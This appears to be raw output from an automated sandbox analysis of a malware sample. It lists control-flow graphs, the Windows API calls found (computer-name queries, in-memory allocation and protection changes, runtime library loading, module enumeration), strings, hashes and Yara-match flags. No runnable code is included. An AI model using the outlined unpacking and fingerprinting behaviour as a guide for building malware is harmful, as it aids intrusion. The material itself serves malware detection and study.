                                                      • Not Executed
                                                      control_flow_graph 604 424084-424098 606 4240f4-4240fd 604->606 607 42409a-4240b3 604->607 608 424147-424148 606->608 609 4240b5 607->609 610 4240ff 607->610 612 424150-424159 608->612 613 4240c0-4240f0 609->613 611 424101-424108 610->611 614 424117-42412d 611->614 615 42410a-424115 611->615 612->612 616 42415b-4241dd 612->616 613->613 617 4240f2 613->617 618 424130-424138 614->618 615->618 619 424228-424231 616->619 620 4241df 616->620 617->611 621 424140-424145 618->621 622 42413a-42413c 618->622 624 424233-424239 619->624 625 42424b-424257 619->625 623 4241e0-424226 620->623 621->608 622->608 626 42413e 622->626 623->619 623->623 627 424240-424249 624->627 628 42426b-424276 625->628 629 424259-42425f 625->629 626->616 627->625 627->627 632 424281-424323 call 438070 628->632 633 424278-42427e call 408700 628->633 630 424260-424269 629->630 630->628 630->630 639 424325 632->639 640 424378-424381 632->640 633->632 641 424330-424376 639->641 642 424383-424389 640->642 643 42439b-4243a7 640->643 641->640 641->641 644 424390-424399 642->644 645 4243bb-4243e9 call 408770 call 438070 643->645 646 4243a9-4243af 643->646 644->643 644->644 651 4243ee-4243f8 645->651 648 4243b0-4243b9 646->648 648->645 648->648 652 4243fb-42445d 651->652 653 4244a8-4244b1 652->653 654 42445f 652->654 656 4244b3-4244b9 653->656 657 4244cb-4244d7 653->657 655 424460-4244a6 654->655 655->653 655->655 658 4244c0-4244c9 656->658 659 4244eb-4244f9 call 438070 657->659 660 4244d9-4244df 657->660 658->657 658->658 663 4244fe-42456b GetComputerNameExA 659->663 661 4244e0-4244e9 660->661 661->659 661->661 664 4245b2-4245bb 663->664 665 42456d-42456f 663->665 667 4245db-4245e7 664->667 668 4245bd-4245c3 664->668 666 424570-4245b0 665->666 666->664 666->666 670 4245fb-424679 GetComputerNameExA 667->670 671 4245e9-4245ef 667->671 669 4245d0-4245d9 668->669 669->667 669->669 673 4246d2-4246db 670->673 674 42467b 670->674 672 4245f0-4245f9 671->672 672->670 672->672 676 4246fb-424707 673->676 677 4246dd-4246e3 673->677 675 424680-4246d0 674->675 675->673 675->675 678 42471b-424780 676->678 679 424709-42470f 676->679 680 4246f0-4246f9 677->680 683 424782 678->683 684 4247c0-4247c9 678->684 681 424710-424719 679->681 680->676 680->680 681->678 681->681 685 424790-4247be 683->685 686 4247eb-4247f7 684->686 687 4247cb-4247d1 684->687 685->684 685->685 689 42480b-42488a call 438070 686->689 690 4247f9-4247ff 686->690 688 4247e0-4247e9 687->688 688->686 688->688 695 4248e9-4248f2 689->695 696 42488c-42488f 689->696 691 424800-424809 690->691 691->689 691->691 698 4248f4-424902 695->698 699 42491d-42491f 695->699 697 424890-4248e7 696->697 697->695 697->697 700 424910-424919 698->700 701 424925-424933 699->701 700->700 702 42491b 700->702 703 424958-424961 701->703 702->701 704 424a01-424a04 703->704 705 424967-42496d 703->705 706 424a0a-424a50 704->706 707 424940-424942 705->707 708 42496f-424999 705->708 710 424a52 706->710 711 424aa5-424ab0 706->711 709 424947-424952 707->709 712 4249c0-4249ce 708->712 713 42499b-42499e 708->713 709->703 715 424a06-424a08 709->715 716 424a60-424aa3 710->716 718 424ab2-424ab8 711->718 719 424acb-424ace call 429680 711->719 712->709 714 4249d4-4249fc 712->714 713->712 717 4249a0-4249be 713->717 714->709 715->706 716->711 716->716 717->709 720 424ac0-424ac9 718->720 722 424ad3-424aef 719->722 720->719 720->720
                                                      APIs
                                                      • GetComputerNameExA.KERNELBASE(00000006,?,00000200), ref: 0042451D
                                                      • GetComputerNameExA.KERNELBASE(00000005,00000000,00000200), ref: 00424618
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd
                                                      Similarity
                                                      • API ID: ComputerName
                                                      • String ID: P6D/
                                                      • API String ID: 3545744682-4117495492
                                                      • Opcode ID: ec06e984c2a30449314d1b88ce17414e3d69ff200de55d535a507df5e3aeb3c0
                                                      • Instruction ID: 24e67b7c81de9a4d5bd346c315e300abd70e7ef5a1aa41be01d77cb8b643429b
                                                      • Opcode Fuzzy Hash: ec06e984c2a30449314d1b88ce17414e3d69ff200de55d535a507df5e3aeb3c0
                                                      • Instruction Fuzzy Hash: 0F328D70204B928AD726CB34D494BE3BBE1EF57309F48496DD0FB8B282C7796446CB55
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 723 424087-424098 725 4240f4-4240fd 723->725 726 42409a-4240b3 723->726 727 424147-424148 725->727 728 4240b5 726->728 729 4240ff 726->729 731 424150-424159 727->731 732 4240c0-4240f0 728->732 730 424101-424108 729->730 733 424117-42412d 730->733 734 42410a-424115 730->734 731->731 735 42415b-4241dd 731->735 732->732 736 4240f2 732->736 737 424130-424138 733->737 734->737 738 424228-424231 735->738 739 4241df 735->739 736->730 740 424140-424145 737->740 741 42413a-42413c 737->741 743 424233-424239 738->743 744 42424b-424257 738->744 742 4241e0-424226 739->742 740->727 741->727 745 42413e 741->745 742->738 742->742 746 424240-424249 743->746 747 42426b-424276 744->747 748 424259-42425f 744->748 745->735 746->744 746->746 751 424281-424323 call 438070 747->751 752 424278-42427e call 408700 747->752 749 424260-424269 748->749 749->747 749->749 758 424325 751->758 759 424378-424381 751->759 752->751 760 424330-424376 758->760 761 424383-424389 759->761 762 42439b-4243a7 759->762 760->759 760->760 763 424390-424399 761->763 764 4243bb-42445d call 408770 call 438070 762->764 765 4243a9-4243af 762->765 763->762 763->763 772 4244a8-4244b1 764->772 773 42445f 764->773 767 4243b0-4243b9 765->767 767->764 767->767 775 4244b3-4244b9 772->775 776 4244cb-4244d7 772->776 774 424460-4244a6 773->774 774->772 774->774 777 4244c0-4244c9 775->777 778 4244eb-42456b call 438070 GetComputerNameExA 776->778 779 4244d9-4244df 776->779 777->776 777->777 783 4245b2-4245bb 778->783 784 42456d-42456f 778->784 780 4244e0-4244e9 779->780 780->778 780->780 786 4245db-4245e7 783->786 787 4245bd-4245c3 783->787 785 424570-4245b0 784->785 785->783 785->785 789 4245fb-424679 GetComputerNameExA 786->789 790 4245e9-4245ef 786->790 788 4245d0-4245d9 787->788 788->786 788->788 792 4246d2-4246db 789->792 793 42467b 789->793 791 4245f0-4245f9 790->791 791->789 791->791 795 4246fb-424707 792->795 796 4246dd-4246e3 792->796 794 424680-4246d0 793->794 794->792 794->794 797 42471b-424780 795->797 798 424709-42470f 795->798 799 4246f0-4246f9 796->799 802 424782 797->802 803 4247c0-4247c9 797->803 800 424710-424719 798->800 799->795 799->799 800->797 800->800 804 424790-4247be 802->804 805 4247eb-4247f7 803->805 806 4247cb-4247d1 803->806 804->803 804->804 808 42480b-42488a call 438070 805->808 809 4247f9-4247ff 805->809 807 4247e0-4247e9 806->807 807->805 807->807 814 4248e9-4248f2 808->814 815 42488c-42488f 808->815 810 424800-424809 809->810 810->808 810->810 817 4248f4-424902 814->817 818 42491d-42491f 814->818 816 424890-4248e7 815->816 816->814 816->816 819 424910-424919 817->819 820 424925-424933 818->820 819->819 821 42491b 819->821 822 424958-424961 820->822 821->820 823 424a01-424a04 822->823 824 424967-42496d 822->824 825 424a0a-424a50 823->825 826 424940-424942 824->826 827 42496f-424999 824->827 829 424a52 825->829 830 424aa5-424ab0 825->830 828 424947-424952 826->828 831 4249c0-4249ce 827->831 832 42499b-42499e 827->832 828->822 834 424a06-424a08 828->834 835 424a60-424aa3 829->835 837 424ab2-424ab8 830->837 838 424acb-424ace call 429680 830->838 831->828 833 4249d4-4249fc 831->833 832->831 836 4249a0-4249be 832->836 833->828 834->825 835->830 835->835 836->828 839 424ac0-424ac9 837->839 841 424ad3-424aef 838->841 839->838 839->839
                                                      APIs
                                                      • GetComputerNameExA.KERNELBASE(00000006,?,00000200), ref: 0042451D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd
                                                      Similarity
                                                      • API ID: ComputerName
                                                      • String ID: P6D/
                                                      • API String ID: 3545744682-4117495492
                                                      • Opcode ID: 34397599d365594b1f27bb1d2b1b2e758320cc75eb18bdda5297ea087a9b94d1
                                                      • Instruction ID: 368cbe518a004d91c844a8922d65ddcbde3b63ca03ed0cce2041834018fe7c5f
                                                      • Opcode Fuzzy Hash: 34397599d365594b1f27bb1d2b1b2e758320cc75eb18bdda5297ea087a9b94d1
                                                      • Instruction Fuzzy Hash: B9329B70604B528AD726CF34D8A4BE3BBE1EF56308F48496DD0FB8B282C7796446CB55
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: )$IDAT$IEND$IHDR
                                                      • API String ID: 0-3181356877
                                                      • Opcode ID: 999feb72cb34461e31fad44a3bfa48fb88dcf5108d16b411e1a0856aea14924b
                                                      • Instruction ID: 616d1399deee0a63aede7b3c3a380fc91103d69987d9aa92d37846ddb7d7f5fd
                                                      • Opcode Fuzzy Hash: 999feb72cb34461e31fad44a3bfa48fb88dcf5108d16b411e1a0856aea14924b
                                                      • Instruction Fuzzy Hash: 6312EFB1A083448FD714CF29DC9076A7BE1EF85304F04857EEA849B392D779D909CB9A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: x
                                                      • API String ID: 0-2363233923
                                                      • Opcode ID: ad05adff6cc53639aa453a7d6789a5a507c4f618ea68bd813a2b9754d8c9e1cc
                                                      • Instruction ID: 5e393febd6900f2cd60b323e8f13313b4837cbc21583559a6409e5a725ef4311
                                                      • Opcode Fuzzy Hash: ad05adff6cc53639aa453a7d6789a5a507c4f618ea68bd813a2b9754d8c9e1cc
                                                      • Instruction Fuzzy Hash: D071A1B15087818BD324CF24C49179BFBE1AFD5344F04892EE5D987382D639D949CB56
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02BF81A6
                                                      • Module32First.KERNEL32(00000000,00000224), ref: 02BF81C6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2298209608.0000000002BF7000.00000040.00000020.00020000.00000000.sdmp, Offset: 02BF7000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2bf7000_VoGtelkHSn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFirstModule32SnapshotToolhelp32
                                                      • String ID:
                                                      • API String ID: 3833638111-0
                                                      • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                      • Instruction ID: d5e1cf431282f4f0da22eaf7a2e224161bf227ed4ed0f1d65aa5a83021806f0e
                                                      • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                      • Instruction Fuzzy Hash: 2DF062321007106BE7603AF5988CB6BB6E9EF49724F1006A9E742914C0DB70E9894A61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: onqp$F
                                                      • API String ID: 0-3477909023
                                                      • Opcode ID: c3083e97637d1b98026382a83799bf2342d2e2ddf52232be111aac2c52a1a691
                                                      • Instruction ID: 63a37f33c9773b82383deb7d5d266ebc64ff0dd11a4c80cef5b7f70997e62e81
                                                      • Opcode Fuzzy Hash: c3083e97637d1b98026382a83799bf2342d2e2ddf52232be111aac2c52a1a691
                                                      • Instruction Fuzzy Hash: 3121A3B96183418FD72CCF04D5A07BFB7E2AFC6708F54182DE9824B381C77998418B8A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: onqp
                                                      • API String ID: 0-1718216680
                                                      • Opcode ID: f26432a11f0e7628f2c7279f7c5f6f07fb9995b0172de89e613e759d3e56c9af
                                                      • Instruction ID: 443a94687d516e7fce39df943a97d10845015d358397bdc9878ab89e8d70c56d
                                                      • Opcode Fuzzy Hash: f26432a11f0e7628f2c7279f7c5f6f07fb9995b0172de89e613e759d3e56c9af
                                                      • Instruction Fuzzy Hash: AAA1FFB16443018BD714EF14CCA1BABB3E1FF95724F18491EE49287391E378E991CB9A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • LdrInitializeThunk.NTDLL(00438D36,005C003F,00000006,?,?,00000018,82818087,?,ZKA), ref: 00433CED
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 8bfd55fa9a3783dde79afca9779d4b7cf76278c514d5c7b39b661a11ebe4b8a8
                                                      • Instruction ID: c1b3d4492825e51a2129b00b8cd86cf652684bda125d9e4c8d1b0ba6372c1005
                                                      • Opcode Fuzzy Hash: 8bfd55fa9a3783dde79afca9779d4b7cf76278c514d5c7b39b661a11ebe4b8a8
                                                      • Instruction Fuzzy Hash: 74E0B675508212EBDA05DF45C14051FF7E2BFC4B14F55C88EE88433204C7B8AD45DB42
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: E&eb
                                                      • API String ID: 0-175690455
                                                      • Opcode ID: e98a84fdc1d20ca021328a73e32aeb666d55a0fa0048f113b6151455cacfdda1
                                                      • Instruction ID: b8f5a8e3dcf807d80dac774d48860337069215117526bb8331fba5c9a38cef06
                                                      • Opcode Fuzzy Hash: e98a84fdc1d20ca021328a73e32aeb666d55a0fa0048f113b6151455cacfdda1
                                                      • Instruction Fuzzy Hash: D931B1B1600B018BC725DF75C881AA7B3E2EF89314F18892DD0AAC7791E739F5818744
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 46fbeddb66f7a8c04074172de88dd742a5524ad022029cc08458de20aa75746c
                                                      • Instruction ID: 33964663c1c25b7ce45e863f8a9a155cb930722d678f5f3125d4410b750ac910
                                                      • Opcode Fuzzy Hash: 46fbeddb66f7a8c04074172de88dd742a5524ad022029cc08458de20aa75746c
                                                      • Instruction Fuzzy Hash: C0E168B8600B018FD328CF25D994B27B7E5FB49308F84492DE49687B62E778F845CB58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 68a2294082866bf6114f45707dfe1b1796c80333bdd16e9bd7e32dcba99880e2
                                                      • Instruction ID: cfdd1eac7a752c9895d8910292a9cdf1f7f4ab7debb0d412fb0fa544ba69e460
                                                      • Opcode Fuzzy Hash: 68a2294082866bf6114f45707dfe1b1796c80333bdd16e9bd7e32dcba99880e2
                                                      • Instruction Fuzzy Hash: E3C1E2B1B083518FD314CF18D89072BB7E1EB95318F65492EF49587392E379D845CB8A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 816d739d9816e7563fb8951fe6eb3b7e7680ee0badac0fb37556324e6883847d
                                                      • Instruction ID: 2ad7af327792f261ff722e5f1da2ed22df55520e29869c472b0f36c5ca345de1
                                                      • Opcode Fuzzy Hash: 816d739d9816e7563fb8951fe6eb3b7e7680ee0badac0fb37556324e6883847d
                                                      • Instruction Fuzzy Hash: E6A18A74600B018FE728CF25C994B17B7E1FB49304F14896DE5AA8BB91D779F905CB88
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: f93c6d70c7d567d40c62c44ae16b965ed5b1ad59c69b285aa2d3c541235419ac
                                                      • Instruction ID: be2f659581eec67e65d3233d53e9a8afebf0bf0bc19166d434e5d2f0596eea41
                                                      • Opcode Fuzzy Hash: f93c6d70c7d567d40c62c44ae16b965ed5b1ad59c69b285aa2d3c541235419ac
                                                      • Instruction Fuzzy Hash: C881BD70A083029BE314CF14C494B2BBBE1FB89759F64991DF4855B392D378DE45CB8A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5b5f4f53ba419257f2c99d53f27223171b991d6193ee5832ef2f56c753d8d8e1
                                                      • Instruction ID: 4c680af95089d7f0266524c2a1d5a39c2a6c001387b2c56eb0ee7e33708b2ad5
                                                      • Opcode Fuzzy Hash: 5b5f4f53ba419257f2c99d53f27223171b991d6193ee5832ef2f56c753d8d8e1
                                                      • Instruction Fuzzy Hash: FB5168742007119BD724CF28C861B62B3F1FF4A318F548A5DE8968B7A1D779B845CB94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a8b148af547a59128bb71e64be0d4d12e62a739c123e6228515b622e6ca986d7
                                                      • Instruction ID: e2717505d55db8640db63e85cfe19b0466bde158ad5ac179620a4d1d884c2fba
                                                      • Opcode Fuzzy Hash: a8b148af547a59128bb71e64be0d4d12e62a739c123e6228515b622e6ca986d7
                                                      • Instruction Fuzzy Hash: 124179746083029BE708DF04C594B2FB7E6BFDA718F68591DE0858B341D338ED169B9A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a2911f6e714779df75f77f4e9c30eb5bfbff7d856db354c347998ed89740c5d8
                                                      • Instruction ID: c1c90ed302c5d13420f5bca68ce5e1754aac3df7c22edd8dd8ca255a1c6ae94c
                                                      • Opcode Fuzzy Hash: a2911f6e714779df75f77f4e9c30eb5bfbff7d856db354c347998ed89740c5d8
                                                      • Instruction Fuzzy Hash: 2C216D746083029BE310DF04C994B1FB7F2BBC5B08F245A1DE1949B396C779DC059B9A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 71eeffcf46f1b7fa9e56d8600949dbbcd25cfd78c9bd91e554dbcc0743bda1b8
                                                      • Instruction ID: e757895f7bb26a2b2320ca7d8dd105008f44d0bd9ca2c0e57cc8f66670818d05
                                                      • Opcode Fuzzy Hash: 71eeffcf46f1b7fa9e56d8600949dbbcd25cfd78c9bd91e554dbcc0743bda1b8
                                                      • Instruction Fuzzy Hash: 43E0E5B06083018FC314EF28D591B5BBBE0FB89304F12C82DE49A8B254D779A944CB45
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 165 2eb003c-2eb0047 166 2eb0049 165->166 167 2eb004c-2eb0263 call 2eb0a3f call 2eb0e0f call 2eb0d90 VirtualAlloc 165->167 166->167 182 2eb028b-2eb0292 167->182 183 2eb0265-2eb0289 call 2eb0a69 167->183 185 2eb02a1-2eb02b0 182->185 187 2eb02ce-2eb03c2 VirtualProtect call 2eb0cce call 2eb0ce7 183->187 185->187 188 2eb02b2-2eb02cc 185->188 194 2eb03d1-2eb03e0 187->194 188->185 195 2eb0439-2eb04b8 VirtualFree 194->195 196 2eb03e2-2eb0437 call 2eb0ce7 194->196 198 2eb04be-2eb04cd 195->198 199 2eb05f4-2eb05fe 195->199 196->194 201 2eb04d3-2eb04dd 198->201 202 2eb077f-2eb0789 199->202 203 2eb0604-2eb060d 199->203 201->199 207 2eb04e3-2eb0505 LoadLibraryA 201->207 205 2eb078b-2eb07a3 202->205 206 2eb07a6-2eb07b0 202->206 203->202 208 2eb0613-2eb0637 203->208 205->206 209 2eb086e-2eb08be LoadLibraryA 206->209 210 2eb07b6-2eb07cb 206->210 211 2eb0517-2eb0520 207->211 212 2eb0507-2eb0515 207->212 213 2eb063e-2eb0648 208->213 219 2eb08c7-2eb08f9 209->219 215 2eb07d2-2eb07d5 210->215 216 2eb0526-2eb0547 211->216 212->216 213->202 214 2eb064e-2eb065a 213->214 214->202 218 2eb0660-2eb066a 214->218 220 2eb07d7-2eb07e0 215->220 221 2eb0824-2eb0833 215->221 217 2eb054d-2eb0550 216->217 224 2eb05e0-2eb05ef 217->224 225 2eb0556-2eb056b 217->225 226 2eb067a-2eb0689 218->226 228 2eb08fb-2eb0901 219->228 229 2eb0902-2eb091d 219->229 222 2eb07e2 220->222 223 2eb07e4-2eb0822 220->223 227 2eb0839-2eb083c 221->227 222->221 223->215 224->201 230 2eb056f-2eb057a 225->230 231 2eb056d 225->231 232 2eb068f-2eb06b2 226->232 233 2eb0750-2eb077a 226->233 227->209 234 2eb083e-2eb0847 227->234 228->229 235 2eb059b-2eb05bb 230->235 236 2eb057c-2eb0599 230->236 231->224 237 2eb06ef-2eb06fc 232->237 238 2eb06b4-2eb06ed 232->238 233->213 239 2eb084b-2eb086c 234->239 240 2eb0849 234->240 248 2eb05bd-2eb05db 235->248 236->248 242 2eb074b 237->242 243 2eb06fe-2eb0748 237->243 238->237 239->227 240->209 242->226 243->242 248->217
                                                      APIs
                                                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02EB024D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2298477137.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2eb0000_VoGtelkHSn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID: cess$kernel32.dll
                                                      • API String ID: 4275171209-1230238691
                                                      • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                      • Instruction ID: c24e50f031e581284867b84552ef9972ccbf3b2bdfaf9f7d465f73cc43b6759a
                                                      • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                      • Instruction Fuzzy Hash: 1A526974A01229DFDB65CF68C984BADBBB1BF09304F1480D9E94DAB351DB30AA85CF14
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 286 41d690-41d70e 287 41d710-41d744 286->287 288 41d746-41d789 RtlExpandEnvironmentStrings 286->288 287->287 287->288 289 41d792 288->289 290 41d78b-41d790 288->290 291 41d795-41d827 call 433b50 RtlExpandEnvironmentStrings 289->291 290->291 294 41d879-41d8af 291->294 295 41d829 291->295 297 41d8b1-41d8b6 294->297 298 41d8b8-41d8bd 294->298 296 41d830-41d877 295->296 296->294 296->296 299 41d8c0-41d8d1 call 433b50 297->299 298->299 302 41d8f1-41d901 299->302 303 41d8d3-41d8d8 299->303 305 41d921-41d932 call 438d50 302->305 306 41d903-41d90a 302->306 304 41d8e0-41d8ef 303->304 304->302 304->304 309 41d937-41d954 305->309 308 41d910-41d91f 306->308 308->305 308->308
                                                      APIs
                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0041D77D
                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 0041D7A8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
